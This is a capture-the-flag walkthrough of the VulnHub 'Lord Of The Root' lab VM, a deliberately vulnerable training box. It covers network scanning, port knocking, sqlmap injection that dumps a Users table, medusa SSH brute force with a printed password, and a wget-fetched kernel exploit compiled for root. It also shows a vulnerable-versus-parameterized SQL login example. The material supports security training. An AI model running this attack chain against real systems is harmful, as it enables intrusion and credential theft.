Lord Of The Root.md

File metadata and controls

173 lines (85 loc) · 7.81 KB

Download link: https://www.vulnhub.com/entry/lord-of-the-root-101%2C129/

To find the IP address of the virtual machine after the lab setup, we run the following command:

netdiscover -i eth1 -r 192.168.56/24


Looking at the output above, we have found the IP address of the virtual machine. In the next step we run an nmap scan.

We run the following command:

nmap -T5 -A -n 192.168.56.104

The output shows that the SSH service is open, so we try to establish an SSH connection by running:

ssh root@192.168.56.104


Looking at the output, we are greeted with a message telling us that we need to perform port knocking.

Download the Python tool from https://github.com/grongor/knock and run it with the knock sequence:

./knock.py 192.168.56.104 1 2 3


Then we scan with nmap again:

nmap -T5 -sS -A -n 192.168.56.104 --top-ports 1000


The output shows that port 1337 is now open, so we visit the website served on that port.


When we visit the website, there is a photo with the inscription "I will take the ring to Mordor". Looking at the page source, only a single img src line for the photo is visible. Since nothing more could be obtained from this page, directory discovery was started.

We run the following command against the web service on port 1337:

dirb http://192.168.56.104:1337


As the output shows, an images folder was found. The files in it were checked with exiftool and binwalk, and the contrast of the downloaded photos was adjusted, but none of these checks turned up anything. Next, robots.txt, which should be checked in every CTF, was examined.


The output above shows that another photo welcomes us, so we look at the source code of that page.


In the output we find something: a string that has been base64-encoded twice. We decode it twice.


We go to the directory revealed by the decoded output.


The gates of Mordor welcome us :) . This login page is suspected to have a SQL injection vulnerability, so the necessary tests were carried out. We start Burp, enable intercept, submit a POST request to the login form and save the intercepted request to a file.


After saving the request, we open it with a text editor.


As you can see, the * character has been appended to the usertest value. This marks, for sqlmap, exactly where in the POST request the payloads should be injected.

sqlmap -r burpresult.txt --technique T --dbms mysql --dbs

We run the command (burpresult.txt is the request file we saved), confirm that the vulnerability exists, and start retrieving database names.


Looking at the database names, it is obvious that we should retrieve the contents of the database named Webapp.

sqlmap -r burpresult.txt --dbms mysql --technique T --tables -D Webapp


Let's dump the Users table, which is the only table; first, however, we need the column names in order to pull the data from the right columns.

sqlmap -r burpresult.txt --dbms mysql --technique T -D Webapp -T Users --columns

Since the username and password columns are the ones we need, we start dumping their data.

sqlmap -r burpresult.txt --dbms mysql --technique T -D Webapp -T Users -C username --dump


We now have the usernames; next we dump the passwords.

sqlmap -r burpresult.txt --dbms mysql --technique T -D Webapp -T Users -C password --dump

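As an added illustration that is not part of the original writeup, the following Python snippet shows the class of defect sqlmap found on the login form beside its fix: a login check that splices user input into the SQL text accepts a crafted password, while the same check with bound parameters does not. The table and its rows are constructed for the example and are not the real Webapp data.

```python
import sqlite3

# Constructed stand-in for the Webapp.Users table; the rows are invented
# for this example and are not the real credentials from the box.
SAMPLE_USERS = [("frodo", "example-pass-1"), ("smeagol", "example-pass-2")]


def build_db():
    """Create an in-memory database with the same column names sqlmap dumped."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO Users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check that splices user input into the SQL text.

    This is the defect class sqlmap reported on the login form: the input
    can change the structure of the query, not just the compared value.
    """
    sql = (
        "SELECT username FROM Users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same check with bound parameters: input is always data, never SQL."""
    sql = "SELECT username FROM Users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    crafted = "' OR '1'='1"  # textbook tautology, used here only to show the fix
    print("vulnerable, valid creds :", login_vulnerable(db, "frodo", "example-pass-1"))
    print("vulnerable, crafted pw  :", login_vulnerable(db, "nobody", crafted))
    print("parameterized, crafted  :", login_parameterized(db, "nobody", crafted))
```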

We write these usernames and passwords to two text files, users and passwords.

Since we do not know which user is authorized to connect via SSH, we brute-force the SSH service with medusa:

medusa -h 192.168.56.104 -U users -P passwords -M ssh


The brute-force attack yields a valid username and password, so we connect over SSH with them:

ssh smeagol@192.168.56.104

We are prompted for the password, enter MyPreciousR00t, and drop into a shell. Once in the shell, we type whoami to see who we are.


We see that we are not root, so we need to look for privilege-escalation exploits for this system. First we run the following command to see the system information and kernel version:

uname -a


We search Google for the system information to find matching exploits.


Here we come across two exploits; we try the first of them.

wget https://www.exploit-db.com/download/39166


Then, as shown in the screenshot, we enter the commands in order to compile and run the C code.


When we type whoami, we see that we are root.


Finally, we go to the root directory, read the Flag.txt in it, and the CTF ends here.

Thank you for reading.